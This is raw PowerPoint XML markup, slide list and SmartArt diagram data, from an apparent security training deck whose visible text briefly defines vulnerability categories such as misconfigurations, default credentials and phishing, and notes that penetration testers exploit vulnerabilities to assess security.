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87" r:id="rId2"/>
    <p:sldId id="272" r:id="rId3"/>
    <p:sldId id="271" r:id="rId4"/>
    <p:sldId id="267" r:id="rId5"/>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="288" r:id="rId9"/>
    <p:sldId id="284" r:id="rId10"/>
    <p:sldId id="282" r:id="rId11"/>
    <p:sldId id="285" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="294" r:id="rId14"/>
    <p:sldId id="295" r:id="rId15"/>
    <p:sldId id="297" r:id="rId16"/>
    <p:sldId id="298" r:id="rId17"/>
    <p:sldId id="296" r:id="rId18"/>
    <p:sldId id="289" r:id="rId19"/>
    <p:sldId id="290" r:id="rId20"/>
    <p:sldId id="291" r:id="rId21"/>
    <p:sldId id="292" r:id="rId22"/>
    <p:sldId id="293" r:id="rId23"/>
    <p:sldId id="304" r:id="rId24"/>
    <p:sldId id="305" r:id="rId25"/>
    <p:sldId id="306" r:id="rId26"/>
    <p:sldId id="307" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="257" r:id="rId29"/>
    <p:sldId id="258" r:id="rId30"/>
    <p:sldId id="259" r:id="rId31"/>
    <p:sldId id="260" r:id="rId32"/>
    <p:sldId id="261" r:id="rId33"/>
    <p:sldId id="262" r:id="rId34"/>
    <p:sldId id="263" r:id="rId35"/>
    <p:sldId id="264" r:id="rId36"/>
    <p:sldId id="265" r:id="rId37"/>
    <p:sldId id="310" r:id="rId38"/>
    <p:sldId id="311" r:id="rId39"/>
    <p:sldId id="312" r:id="rId40"/>
    <p:sldId id="313" r:id="rId41"/>
    <p:sldId id="302" r:id="rId42"/>
    <p:sldId id="299" r:id="rId43"/>
    <p:sldId id="300" r:id="rId44"/>
    <p:sldId id="301" r:id="rId45"/>
    <p:sldId id="316" r:id="rId46"/>
    <p:sldId id="317" r:id="rId47"/>
    <p:sldId id="318" r:id="rId48"/>
    <p:sldId id="319" r:id="rId49"/>
    <p:sldId id="320" r:id="rId50"/>
    <p:sldId id="321" r:id="rId51"/>
    <p:sldId id="274" r:id="rId52"/>
    <p:sldId id="275" r:id="rId53"/>
    <p:sldId id="276" r:id="rId54"/>
    <p:sldId id="277" r:id="rId55"/>
    <p:sldId id="278" r:id="rId56"/>
    <p:sldId id="279" r:id="rId57"/>
    <p:sldId id="280" r:id="rId58"/>
    <p:sldId id="28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324B8A-8829-4B78-A2B5-E5FD4C7989F9}"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9A01635F-8EF3-480F-86EA-2179D3F3B6CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Knowing about vulnerabilities is essential for penetration testers, as they will often exploit these to assess security during engagements.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D01FDBF0-DA30-4626-9F04-004C791A72CC}" type="parTrans" cxnId="{368DA20C-9289-41E0-A4E3-C754CB40BFBA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{038CF600-EDAC-44F6-A5F8-F1D7175DDECA}" type="sibTrans" cxnId="{368DA20C-9289-41E0-A4E3-C754CB40BFBA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3F616FE-EBFD-498B-B85B-4145B4F03418}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Vulnerabilities play a critical role in an organization's vulnerability management, where the goal is to identify, prioritize, and mitigate potential threats.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34E39A79-1E8A-4FBC-A6A4-DA5D3475D8A5}" type="parTrans" cxnId="{93951371-F947-4991-B6E8-58A0E11849D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71C60675-4F07-4137-A7F8-137801F5FD70}" type="sibTrans" cxnId="{93951371-F947-4991-B6E8-58A0E11849D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB5D320B-3D51-4CC3-8B12-A358A3F46BE7}" type="pres">
      <dgm:prSet presAssocID="{43324B8A-8829-4B78-A2B5-E5FD4C7989F9}" presName="hierChild1" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4339A601-9EDD-42D4-ACDE-89D68E42E8A8}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="hierRoot1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9FA090B0-2552-4EA9-BF02-8F14EC272B73}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42AFDF0B-6643-4627-9C4F-407B6B7004B0}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="background" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{62B8901D-01D5-442C-BBF3-ED6F538051F6}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="text" presStyleLbl="fgAcc0" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{94302866-C5D4-4219-B184-BE411308993C}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82F17434-496C-44FE-B108-87EFAB26346C}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="hierRoot1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB41F40C-5AC2-48FE-824D-9B09F689AA75}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87A1B657-444F-437B-A7DB-2183CE8074A3}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="background" presStyleLbl="node0" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8407EFF4-6D45-4449-8017-216DD6B9DE61}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="text" presStyleLbl="fgAcc0" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05E16EBB-48EB-4EE9-94D5-868F605449E7}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{368DA20C-9289-41E0-A4E3-C754CB40BFBA}" srcId="{43324B8A-8829-4B78-A2B5-E5FD4C7989F9}" destId="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" srcOrd="0" destOrd="0" parTransId="{D01FDBF0-DA30-4626-9F04-004C791A72CC}" sibTransId="{038CF600-EDAC-44F6-A5F8-F1D7175DDECA}"/>
    <dgm:cxn modelId="{93951371-F947-4991-B6E8-58A0E11849D2}" srcId="{43324B8A-8829-4B78-A2B5-E5FD4C7989F9}" destId="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" srcOrd="1" destOrd="0" parTransId="{34E39A79-1E8A-4FBC-A6A4-DA5D3475D8A5}" sibTransId="{71C60675-4F07-4137-A7F8-137801F5FD70}"/>
    <dgm:cxn modelId="{3A2E8F78-0E01-4EDA-9859-C61CE854BBD4}" type="presOf" srcId="{43324B8A-8829-4B78-A2B5-E5FD4C7989F9}" destId="{DB5D320B-3D51-4CC3-8B12-A358A3F46BE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5F2967A4-020C-444C-A81F-504A0FA4BAD3}" type="presOf" srcId="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" destId="{62B8901D-01D5-442C-BBF3-ED6F538051F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{918044F5-BA45-4CB6-A3F4-E5845E145C95}" type="presOf" srcId="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" destId="{8407EFF4-6D45-4449-8017-216DD6B9DE61}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{CC854378-846D-4739-983F-0961F5C73720}" type="presParOf" srcId="{DB5D320B-3D51-4CC3-8B12-A358A3F46BE7}" destId="{4339A601-9EDD-42D4-ACDE-89D68E42E8A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{508215D5-FD3C-4A3F-B2E4-E407007DD76E}" type="presParOf" srcId="{4339A601-9EDD-42D4-ACDE-89D68E42E8A8}" destId="{9FA090B0-2552-4EA9-BF02-8F14EC272B73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C68C0CAF-551C-401A-A2A0-528AF0D48831}" type="presParOf" srcId="{9FA090B0-2552-4EA9-BF02-8F14EC272B73}" destId="{42AFDF0B-6643-4627-9C4F-407B6B7004B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{ACC7FD87-7B8C-46FA-B9E4-2C920BA150BD}" type="presParOf" srcId="{9FA090B0-2552-4EA9-BF02-8F14EC272B73}" destId="{62B8901D-01D5-442C-BBF3-ED6F538051F6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{1984909B-ECD7-44E4-8948-79F827913B6E}" type="presParOf" srcId="{4339A601-9EDD-42D4-ACDE-89D68E42E8A8}" destId="{94302866-C5D4-4219-B184-BE411308993C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{85D64C0E-4E55-44D4-ACC6-D08B234EA4AB}" type="presParOf" srcId="{DB5D320B-3D51-4CC3-8B12-A358A3F46BE7}" destId="{82F17434-496C-44FE-B108-87EFAB26346C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{51E78552-ADE9-4488-B436-B1E9F18ABACC}" type="presParOf" srcId="{82F17434-496C-44FE-B108-87EFAB26346C}" destId="{EB41F40C-5AC2-48FE-824D-9B09F689AA75}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E96C6AB3-A5AE-4D69-8127-CA524B34AB57}" type="presParOf" srcId="{EB41F40C-5AC2-48FE-824D-9B09F689AA75}" destId="{87A1B657-444F-437B-A7DB-2183CE8074A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F5359249-9F73-46D1-8B9C-0F64E958141D}" type="presParOf" srcId="{EB41F40C-5AC2-48FE-824D-9B09F689AA75}" destId="{8407EFF4-6D45-4449-8017-216DD6B9DE61}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{81111A32-69EA-4B2A-8B43-10D6556A8877}" type="presParOf" srcId="{82F17434-496C-44FE-B108-87EFAB26346C}" destId="{05E16EBB-48EB-4EE9-94D5-868F605449E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71627A-9D07-4A86-B6CA-2A569AE8943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0FF5AEC-6AB4-46E6-92B2-E08B0832A863}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Operating System Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Often lead to privilege escalation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0CF5661-B9ED-4938-B184-0E7B77BE5C78}" type="parTrans" cxnId="{564D6EA2-99D1-412B-BE6E-9C82BCE3C4F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50EC5754-12EA-419A-A647-0DDDB4CBDA8D}" type="sibTrans" cxnId="{564D6EA2-99D1-412B-BE6E-9C82BCE3C4F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Misconfiguration-Based Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Result from incorrect configuration, such as exposing sensitive data.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{861079B8-8F40-49E0-82C9-D8F18A352F46}" type="parTrans" cxnId="{49840CBD-A5E0-4CE3-B7E2-35A3E3646D44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{641A9597-63D7-41C8-8A4D-8944861B1C07}" type="sibTrans" cxnId="{49840CBD-A5E0-4CE3-B7E2-35A3E3646D44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Weak or Default Credentials</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Easily guessable login credentials like “admin/admin.”</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{368CC7D7-0050-4850-8874-C312A241B8E0}" type="parTrans" cxnId="{B3E2D8B8-A35D-4230-84DB-C24FE57141B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0087A09B-9C93-44FC-83C5-DE83F12FCCDA}" type="sibTrans" cxnId="{B3E2D8B8-A35D-4230-84DB-C24FE57141B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Application Logic Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Flaws in how an application operates, which can be exploited to bypass security.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0861AAEB-EE80-4274-AADD-BB77C1EB9A3A}" type="parTrans" cxnId="{41F88430-77D8-434F-BF66-67D481BBF62B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB6940B7-2E53-4CF8-886C-20E1AA3839EE}" type="sibTrans" cxnId="{41F88430-77D8-434F-BF66-67D481BBF62B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Human-Factor Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Attacks like phishing that exploit human behavio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>r</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D68B5ED-1FCD-4B55-A901-2353028A007D}" type="parTrans" cxnId="{DA471BE0-98F5-4DDA-98CA-F665AFB7F515}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2812C36-BA53-47C8-AFCA-17A7EBCD664D}" type="sibTrans" cxnId="{DA471BE0-98F5-4DDA-98CA-F665AFB7F515}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3362D2C6-64F5-4516-8814-D8690869B54B}" type="pres">
      <dgm:prSet presAssocID="{A971627A-9D07-4A86-B6CA-2A569AE8943B}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB08C557-061F-47CB-AE7B-E30FC4F06B99}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39D6F6EC-D4B4-4EE3-9832-4387E440CBD6}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{85501616-B0C4-415D-B7AF-29F864105B68}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A86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nlock"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{25F6E171-D8C6-45BF-B665-B27C67F421AE}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23E0191F-8FBF-4239-A8FA-9F4CD2D68705}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AD950571-E2DA-410A-87D7-47609D624403}" type="pres">
      <dgm:prSet presAssocID="{50EC5754-12EA-419A-A647-0DDDB4CBDA8D}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BA3320C-ACCE-4B00-A74E-4AE4D1528BC3}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC8816F6-C443-4C38-8B2D-1A4C58BA2F4E}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2D574396-6D6D-46A2-85D0-BD58C82E8386}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0E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975FD4A7-37F2-41BC-82BC-38BB6DDD2658}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ACC1F707-86AA-48F1-AA87-5B77320F775C}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1F579D9-CE9E-4685-8817-D7DE50210E2F}" type="pres">
      <dgm:prSet presAssocID="{641A9597-63D7-41C8-8A4D-8944861B1C07}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5ACE4098-ADBE-4413-A4CB-75AE7EF4CA79}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0041D5B-A451-4BE7-97ED-ECB827100573}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{806E1EAD-6482-4F32-BDAB-A2E0D9356CFF}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490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7476AFEB-422B-448D-A308-AB0E53A61139}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E2A52A9B-CCC7-496B-8D6B-8B0EAA4B3AD7}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4F6C7D1-3FCA-4646-9D25-3B437FCE4E80}" type="pres">
      <dgm:prSet presAssocID="{0087A09B-9C93-44FC-83C5-DE83F12FCCDA}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DFCC0951-D3C7-458E-B719-F674F12A1D55}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8429B3F8-0692-4580-AAAD-ACB10A105C3E}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C71A647-2598-4220-851B-58FCDFB51709}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920B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485A1B60-0833-486A-99F5-66F4C5D15065}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5357FABA-4393-4E78-AC84-092FA64D5A16}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" presName="parTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AFCCD979-5D27-42A9-8D82-2DB128037B34}" type="pres">
      <dgm:prSet presAssocID="{FB6940B7-2E53-4CF8-886C-20E1AA3839EE}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB44108E-61D4-4B24-B07D-F049B5B6A53E}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{92C6FA6F-4A29-442D-B552-CD287699C562}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60CD19B2-7CF6-41F0-BDCF-8B3E74F85A38}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A6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91E45695-7B91-4C88-9E60-B06D9A981D3B}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{076400EC-2719-40EB-94E6-DB42C7CE8C38}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
